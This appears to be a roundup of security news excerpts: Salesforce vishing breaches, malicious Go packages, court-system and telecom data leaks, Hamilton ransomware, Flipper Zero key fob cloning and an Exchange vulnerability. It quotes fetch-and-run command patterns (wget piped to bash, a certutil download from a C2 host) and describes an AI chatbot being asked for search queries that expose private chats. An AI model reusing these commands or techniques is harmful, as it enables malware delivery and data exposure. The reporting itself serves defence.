arstechnica.com - Disclosure comes two months after Google warned the world of ongoing spree.
In June, Google said it unearthed a campaign that was mass-compromising accounts belonging to customers of Salesforce. The means: an attacker pretending to be someone in the customer's IT department feigning some sort of problem that required immediate access to the account. Two months later, Google has disclosed that it, too, was a victim.
The series of hacks are being carried out by financially motivated threat actors out to steal data in hopes of selling it back to the targets at sky-high prices. Rather than exploiting software or website vulnerabilities, they take a much simpler approach: calling the target and asking for access. The technique has proven remarkably successful. Companies whose Salesforce instances have been breached in the campaign, Bleeping Computer reported, include Adidas, Qantas, Allianz Life, Cisco, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co.
Better late than never
The attackers abuse a Salesforce feature that allows customers to link their accounts to third-party apps that integrate data with in-house systems for blogging, mapping tools, and similar resources. The attackers in the campaign contact employees and instruct them to connect an external app to their Salesforce instance. As the employee complies, the attackers ask the employee for an eight-digit security code that the Salesforce interface requires before a connection is made. The attackers then use this number to gain access to the instance and all data stored in it.
Google said that its Salesforce instance was among those that were compromised. The breach occurred in June, but Google only disclosed it on Tuesday, presumably because the company only learned of it recently.
“Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,” the company said.
Data retrieved by the attackers was limited to business information such as business names and contact details, which Google said was “largely public” already.
Google initially attributed the attacks to a group traced as UNC6040. The company went on to say that a second group, UNC6042, has engaged in extortion activities, “sometimes several months after” the UNC6040 intrusions. This group brands itself under the name ShinyHunters.
“In addition, we believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS),” Google said. “These new tactics are likely intended to increase pressure on victims, including those associated with the recent UNC6040 Salesforce-related data breaches.”
With so many companies falling to this scam—including Google, which only disclosed the breach two months after it happened—the chances are good that there are many more we don’t know about. All Salesforce customers should carefully audit their instances to see what external sources have access to it. They should also implement multifactor authentication and train staff how to detect scams before they succeed.
Socket’s Threat Research Team uncovered eleven malicious Go packages, ten of which are still live on the Go Module and eight of which are typosquats, that conceal an identical index-based string obfuscation routine. At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command and control (C2) endpoints, and executes it in memory. Most of the C2 endpoints share the path /storage/de373d0df/a31546bf, and six of the ten URLs are still reachable, giving the threat actor on-demand access to any developer or CI system that imports the packages.
The eight packages include the following:
github.com/stripedconsu/linker
github.com/agitatedleopa/stm
github.com/expertsandba/opt
github.com/wetteepee/hcloud-ip-floater
github.com/weightycine/replika
github.com/ordinarymea/tnsr_ids
github.com/ordinarymea/TNSR_IDS
github.com/cavernouskina/mcp-go
github.com/lastnymph/gouid
github.com/sinfulsky/gouid
github.com/briefinitia/gouid
The packages all use an exec.Command("/bin/sh","-c", <obfuscated>) construct. The array-driven decoder rebuilds a one-liner that downloads a bash script with wget -O - <C2> | /bin/bash & on Unix systems, or (2) uses -urlcache -split -f <C2> %TEMP%\\appwinx64.exe followed by a background start on Windows. Observed second-stage ELF and PE binaries enumerate host information, read browser data, and beacon outbound, often after a first stage triggers a one-hour sleep to evade sandboxes. Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.
therecord.media -Germany’s highest court on Thursday ruled that law enforcement cannot use spyware to monitor personal devices in cases that carry less than a three year maximum sentence.
The court was responding to a lawsuit brought by the German digital freedoms organization Digitalcourage.
The plaintiffs argued that a 2017 rules change enabling law enforcement to use spyware to eavesdrop on encrypted chats and messaging platforms could unfairly expose communications belonging to people who are not criminal suspects.
The 2017 change to the German criminal procedure code was not precise enough about when spyware can be used, the court ruled, saying that snooping software is only appropriate in investigations of serious cases.
Such surveillance causes a “very severe interference” with fundamental rights, the court said in a press release.
Law enforcement use of spyware “enables the interception and analysis of all raw data exchanged and thus has an exceptional reach, particularly given the realities of modern information technology and its significance for communication relations,” the press release said.
politico.com - The identities of confidential court informants are feared compromised in a series of breaches across multiple U.S. states.
The electronic case filing system used by the federal judiciary has been breached in a sweeping cyber intrusion that is believed to have exposed sensitive court data across multiple U.S. states, according to two people with knowledge of the incident.
The hack, which has not been previously reported, is feared to have compromised the identities of confidential informants involved in criminal cases at multiple federal district courts, said the two people, both of whom were granted anonymity because they were not authorized to speak publicly about the hack.
The Administrative Office of the U.S. Courts — which manages the federal court filing system — first determined how serious the issue was around July 4, said the first person. But the office, along with the Justice Department and individual district courts around the country, is still trying to determine the full extent of the incident.
It is not immediately clear who is behind the hack, though nation-state-affiliated actors are widely suspected, the people said. Criminal organizations may also have been involved, they added.
The Administrative Office of the U.S. Courts declined to comment. Asked whether it is investigating the incident, the FBI referred POLITICO to the Justice Department. The Justice Department did not immediately reply to a request for comment.
It is not immediately clear how the hackers got in, but the incident is known to affect the judiciary’s federal core case management system, which includes two overlapping components: Case Management/Electronic Case Files, or CM/ECF, which legal professionals use to upload and manage case documents; and PACER, a system that gives the public limited access to the same data.
In addition to records on witnesses and defendants cooperating with law enforcement, the filing system includes other sensitive information potentially of interest to foreign hackers or criminals, such as sealed indictments detailing non-public information about alleged crimes, and arrests and search warrants that criminal suspects could use to evade capture.
Chief judges of the federal courts in the 8th Circuit — which includes Arkansas, Iowa, Minnesota, Missouri, Nebraska, North Dakota, and South Dakota — were briefed on the hack at a judicial conference last week in Kansas City, said the two people. It is unclear who delivered the brief, though the Director of the Administrative Office of the U.S. Courts, Judge Robert J. Conrad, Jr., was in attendance, per the first person. Supreme Court Justice Brett Kavanaugh was also in attendance but didn’t address the breach in his remarks.
Staff for Conrad, a district judge in the Western District of North Carolina, declined to comment.
The hack is the latest sign that the federal court filing system is struggling to keep pace with a rising wave of cybersecurity threats.
www.digitaldigging.org - Digital Digging investigation: how your AI conversation could end your career
Corporate executives, government employees, and professionals are confessing to crimes, exposing trade secrets, and documenting career-ending admissions in ChatGPT conversations visible to anyone on the internet.
A Digital Digging investigation analyzed 512 publicly shared ChatGPT conversations using targeted keyword searches, uncovering a trove of self-incrimination and leaked confidential data. The shared chats include apparent insider trading schemes, detailed corporate financials, fraud admissions, and evidence of regulatory violations—all preserved as permanently searchable public records.
Among the discoveries is a conversation where a CEO revealed this to ChatGPT:
Confidential Financial Data: About an upcoming settlement
Non-Public Revenue Projections: Specific forecasts showing revenue doubling
Merger intelligence: Detailed valuations
NDA-Protected Partnerships: Information about Asian customers
The person also revealed internal conflict and criticizing executives by name.
Our method reveals an ironic truth: AI itself can expose these vulnerabilities. After discussing the dangers of making chats public, we asked Claude, another AI chatbot, to suggest Google search formulas that might uncover sensitive ChatGPT conversations.
cbc.ca - The insurance company did not cover any of the city’s claims totalling about $5 million. City staff say they've learned from their mistakes and are taking accountability for the cybersecurity breach.
Many City of Hamilton departments didn't have multi-factor authentication in place before cyber criminals launched a massive ransomware attack in February 2024, paralysing nearly all municipal services for weeks.
Multi-factor authentication, also sometimes in the form of two-step verification, is a widely used layer of extra security for users logging into a system like their email accounts. They're required to verify their identity using more than one method, such as entering a code texted to their phone.
It's been used by corporations and technology companies for years. Google, for example, launched its two-step log-in system in 2011.
While not the only reason the attackers were successful, the city's lack of multi-factor authentication was a "root cause" of the breach, as determined by the city's insurance company, said a staff report to the general issues committee Wednesday.
As a result, the insurance company did not cover any of the city's claims totalling about $5 million.
"This has been a test of our system and a test of our leadership," said Mayor Andrea Horwath at a news conference Wednesday. "We are not sweeping this under the rug. We are owning it, we're fixing it and we're learning from it."
The lack of multi-factor authentication, and no insurance coverage, was reported publicly for the first time this month.
The staff report said: "According to the policy, no coverage was available under the policy for any losses where the absence of MFA was the root cause of a cyber breach."
Solicitor Lisa Shields told councillors Wednesday that staff were aware of the multi-factor authentication requirement in their insurance policy in the fall of 2022 and began rolling out a pilot program the following year, but for only a few departments.
In early 2024, the city was preparing to fully implement multi-factor authentication, but then the ransomware attack took place on Feb. 25, said Cyrus Tehrani, acting chief information officer.
He told reporters that — contrary to what the insurance company found — the breach would've happened even with multi-factor authentication in place. The city also told CBC Hamilton in an email that it was a "highly sophisticated attack on an external, internet-facing server, gaining unauthorized access to the City of Hamilton systems."
Attackers demanded $18.5M in ransom
About 80 per cent of city systems were impacted and the attackers demanded the city pay $18.5 million to unlock it — a massive crisis and among the most significant in Canada, city manager Marnie Cluckie told councillors.
Based on advice from outside experts, the city decided not to pay the ransom and instead recover what it could and rebuild everything else. The police investigation is ongoing, Cluckie said.
To date, the city has spent $18.4 million and will continue to pay nearly $400,000 a month until November 2026 to rebuild its systems, said Mike Zegarac, general manager of finance.
La série noire continue. C’est au tour de Pandora de prévenir ses clients d’une « violation de données personnelles ». La communication du joaillier danois est pour le moins surprenante puisqu’elle se dit victime « d'une attaque de cybersécurité » (sic).
Quoi qu’il en soit, « certaines données clients ont été consultées via une plateforme tierce ». Pandora parle de « données courantes […] copiées par l'attaquant, à savoir votre nom, date de naissance, et adresse e-mail ». La société se veut rassurante : « aucun mot de passe, numéro de carte bancaire ou autre donnée confidentielle similaire n’a été concerné par cet incident ».
Pandora affirme que, selon ses vérifications, « rien n’indique que ces données aient été partagées ou publiées ». La société rappelle que la protection de la vie privée est « une priorité absolue » et qu’elle prend cette « situation très au sérieux ».
Ce qui ne l’empêche pas de se cacher derrière ses camarades, rappelant que ce type d’incident est « devenu malheureusement plus courant ces dernières années, en particulier chez les entreprises internationales ». Il est vrai que les fuites se multiplient, mais cela n’en fait pas une bonne raison d’être victime d’une cyberattaque, avec le vol de données personnelles.
Le risque est toujours le même : « des tentatives d’hameçonnage (phishing) menées par des tiers se faisant passer pour Pandora » afin de récupérer davantage d’informations.
next.ink -
Bouygues Telecom prévient actuellement pas moins de 6,4 millions de clients d’un accès non autorisé à certaines de leurs données personnelles… mais aussi bancaires. Attention donc aux risques de phishing et de prélèvements sur vos comptes.
Après une fin d’année 2024 et un début 2025 sur les chapeaux de roues pour les fuites de données, la situation s’était un peu calmée, mais ce fut de courte durée. L’été est chargé, avec des incidents cyber chez Louis Vuitton, France Travail, Allianz Life, Pandora et maintenant Bouygues Telecom.
On y retrouve des informations personnelles telles que les coordonnées, des données contractuelles liées à votre abonnement, des données d'état civil ou celles de l'entreprise si vous êtes un professionnel, ainsi que les IBAN sur la partie bancaire. Toutefois, « les numéros de cartes bancaires et les mots de passe de vos comptes Bouygues Telecom ne sont pas impactés ».
En octobre, Free aussi avait été victime d’une fuite de données personnelles, avec des IBAN. Quelques semaines auparavant, c’était RED by SFR, là aussi avec des données bancaires.
Les risques liés à la fuite d’IBAN
L’IBAN (International Bank Account Number) est l’identifiant international de votre compte bancaire, rattaché à une institution financière dans un pays (il commence par FR pour France, DE pour Allemagne…).
Selon la Banque de France, « communiquer son RIB n’est pas risqué en soi ». Mais « comme pour tout document contenant des informations personnelles, il convient de bien identifier la personne à laquelle vous communiquez un RIB. Un escroc pourrait utiliser ces informations de manière malveillante (ex : usurpation d’identité) », ajoute l'institution.
De son côté, Bouygues Telecom assure qu’une « personne qui détient un numéro IBAN ne pourrait pas émettre de virement sans votre accord ». À juste titre, l’opérateur prend soin d’ajouter que, concernant les prélèvements, c’est plus compliqué : « il est normalement nécessaire que le titulaire du compte signe un mandat SEPA, mais on ne peut pas exclure qu'un fraudeur parvienne à réaliser une telle opération en se faisant passer pour vous ».
En effet, lorsque la signature consiste en un SMS ou un email, une usurpation d’identité est facile à mettre en place.
Bouygues Telecom conseille donc à ses clients de vérifier les prélèvements et d'appeler la banque en cas de doute : « Sachez que la règlementation bancaire prévoit que vous puissiez vous opposer pendant 13 mois à tous les prélèvements effectués sans votre accord sur votre compte bancaire ».
Les cyberattaques sont « très fréquentes et n'épargnent » personne
L’opérateur ne donne pas de détails sur la cyberattaque. Il précise simplement avoir bloqué l'accès, renforcé la surveillance « et mis en œuvre des mesures complémentaires nécessaires ». L’entreprise rappelle aussi que les cyberattaques sont « très fréquentes et n'épargnent aucune entreprise »… un argument repris récemment par Pandora, dans une communication pour le moins surprenante.
Comme l’y oblige la loi, la CNIL a été informée de la situation. De plus, une plainte a été déposée auprès des autorités judiciaires.
Le risque en pareille situation, sans parler des prélèvements sur votre compte, est d’être la cible de phishing. Des pirates peuvent utiliser les données récoltées pour se faire passer pour Bouygues Telecom ou votre banque, afin de récupérer des données supplémentaires.
Hackers are using a custom Flipper Zero firmware to bypass security protections in automotive key fobs, putting millions of vehicles at risk.
Hackers have a new way to break into – or even steal – your car, and all it takes is the push of a button. Malicious actors are circumventing modern security protections in automotive key fobs, researchers warn, putting millions of vehicles at risk.
The hack works by intercepting and cloning a key fob’s radio signal, using custom firmware built for the Flipper Zero, a handheld device designed for analyzing and testing wireless communication protocols.
It bypasses a security mechanism known as rolling codes, designed to prevent thieves from reusing captured key fob signals to unlock a car. Each time the key fob is pressed, an internal algorithm generates a new, one-time-use code, leading the vehicle to unlock only if the code is confirmed to be valid.
But the new hack sidesteps these protections by exploiting the rolling code algorithm to calculate valid key fob commands based on a single intercepted signal.
“I can sit in a parking lot and wait for someone to lock their car, and immediately I get all their fob buttons,” Jeremy Yablan, a hacker known online as RocketGod, told Straight Arrow News. “Other attacks are tricks. This one just captures a single keypress and decodes all buttons and rolling codes in an instant. You open your trunk – the bad guy has your entire fob.”
Yablan described the attack as “ridiculously fast and easy.”
Many vehicles vulnerable
SAN obtained a copy of the firmware and tested the attack in a controlled setting with the permission of vehicle owners. In one case, capturing a single unlock signal allowed the Flipper Zero to repeatedly lock, unlock and open the trunk of the target car.
The hack also disabled the original key fob until it was manually reset.
Vehicles vulnerable to the attack include numerous models manufactured by Chrysler, Dodge, Fiat, Ford, Hyundai, Jeep, Kia, Mitsubishi and Subaru, according to an infographic provided with the firmware. The infographic says updates to attack other car makers, such as Honda, are “in development.” It also mentions high-end car companies such as Alfa Romeo, Ferrari and Maserati.
Numerous car companies listed as susceptible to attack did not respond to SAN’s requests for comment. James Bell, the head of corporate communications at Kia America, said his company “is not aware of this situation and therefore have no comment to offer.”
The team behind the Flipper Zero device, which does not endorse the custom firmware, did not respond to requests for comment.
Created by Russian hacker
The hack appears to be based on a 2022 attack known as “RollBack,” developed by researchers at CrySys Lab in Hungary. The researchers demonstrated how rolling code protections could be broken by capturing valid signals and replaying them in a specific order to bypass a vehicle’s code synchronization system.
The firmware for the Flipper Zero apparently was created by a Russian hacker. Advertisements for the firmware, which includes a serial lock designed to keep it from being distributed to additional users, show it being listed online for as much as $1,000.
The firmware obtained by SAN was a version that had its serial lock disabled by security researchers. The firmware’s creator told SAN that a newer version has since been developed. He shared an updated infographic that lists Suzuki as another vulnerable make.
SAN is not naming the hacker to avoid facilitating the sale of his firmware to potential thieves.
The freelance security researcher and YouTuber known as Talking Sasquach, who regularly covers the Flipper Zero, said the firmware’s creator is marketing the tool specifically to criminals.
‘Only a matter of time’
Protections against the attack are limited.
“There’s really not much people can do to protect themselves against this attack short of just not using your key fob and only using the keys,” Talking Sasquach said.
Given that many modern vehicles do not use traditional keys and rely entirely on key fobs, such workarounds are not viable for all drivers.
“Car companies could issue an update,” Talking Sasquach said, “but they’d have to pull in all of the vehicles and change their software and the key fob’s software, which would probably not be feasible, and a huge cost to manufacturers.”
Despite attempts by the firmware’s creator to limit its distribution, Yablan and other hackers have already managed to remove the built-in licensing restrictions.
The hack is likely to become more commonly used, security researcher Ryan Montgomery, founder of Pentester.com, told SAN.
“It’s only a matter of time,” he said, “before it gets leaked to the masses.”
bleepingcomputer.com - Microsoft has warned customers to mitigate a high-severity vulnerability in Exchange Server hybrid deployments that could allow attackers to escalate privileges in Exchange Online cloud environments undetected.
Exchange hybrid configurations connect on-premises Exchange servers to Exchange Online (part of Microsoft 365), allowing for seamless integration of email and calendar features between on-premises and cloud mailboxes, including shared calendars, global address lists, and mail flow.
However, in hybrid Exchange deployments, on-prem Exchange Server and Exchange Online also share the same service principal, which is a shared identity used for authentication between the two
By abusing this shared identity, attackers who control the on-prem Exchange can potentially forge or manipulate trusted tokens or API calls that the cloud side will accept as legitimate, as it implicitly trusts the on-premises server.
Additionally, actions originating from on-premises Exchange don't always generate logs associated with malicious behavior in Microsoft 365; therefore, traditional cloud-based auditing (such as Microsoft Purview or M365 audit logs) may not capture security breaches if they originated on-premises.
"In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization's connected cloud environment without leaving easily detectable and auditable trace," Microsoft said on Wednesday in a security advisory describing a high-severity privilege escalation vulnerability now tracked as CVE-2025-53786.
The vulnerability affects Exchange Server 2016 and Exchange Server 2019, as well as Microsoft Exchange Server Subscription Edition, the latest version, which replaces the traditional perpetual license model with a subscription-based one.
While Microsoft has yet to observe in-the-wild exploitation, the company has tagged it as "Exploitation More Likely" because its analysis revealed that exploit code could be developed to consistently exploit this vulnerability, increasing its attractiveness to attackers.
theregister.com - European airline giants Air France and KLM say they are the latest in a string of major organizations to have their customers' data stolen by way of a break-in at a third party org.
The airlines, which share a parent company, Air France-KLM Group, said in a joint statement that they "detected unusual activity on an external platform we use for customer service," which led to attackers accessing customer data.
"Our IT security teams, along with the relevant external party, took immediate action to stop the unauthorized access," the statement read. "Measures have also been implemented to prevent recurrence. Internal Air France and KLM systems were not affected.
"No sensitive data such as passwords, travel details, Flying Blue miles, passport, or credit card information was stolen."
The airlines did not publicly specify the types of data that were stolen, but the exclusion of sensitive data suggests basic personal information was involved.
However, customer notifications circulating online noted that first and family names, along with contact details, Flying Blue numbers and tier levels, and the subject lines of service request emails were accessed.
KLM and Air France advised customers to be on heightened alert for phishing attempts. Both said they had referred themselves to the Dutch and French data protection authorities, respectively.
The customer notice from Barry ter Voert, chief experience officer at KLM, read: "We recommend staying alert when receiving messages or other communication using your personal information, and to be cautious of any suspicious activity. The data involved in this breach could be used to make phishing messages appear more credible. If you receive unexpected messages or phone calls, especially asking for personal information or urging you to take action, please check their authenticity.
"We understand the concern this may cause, and we deeply regret any inconvenience this may have caused you."
The Register approached the companies for additional information but they did not comment beyond the public statement.
The attack marks the latest in a string of data lapses at major organizations that also blamed a third party.
In recent weeks, luxury retailers Dior, Chanel, and Pandora all reported similar leaks at third party providers, as did Google, Qantas, and Allianz.
All of the above declined to identify the third party in question except for Google, which said this week that one of its Salesforce instances was raided.
None of the victims have attributed their attacks to any group – yet – but the prime suspect behind all of these intrusions is the ShinyHunters cybercrime crew, which is perhaps best known for its role in last year's attacks on Snowflake customers.
Scattered Spider also changed its focus toward airlines earlier this year, and some researchers said it could be behind the attack on Hawaiian Airlines in June.
Check Point said last month that the attacks on Qantas and WestJet, which all occurred within three weeks of one another, bore hints of Scattered Spider's involvement, mainly due to the tradecraft that led to the intrusions.
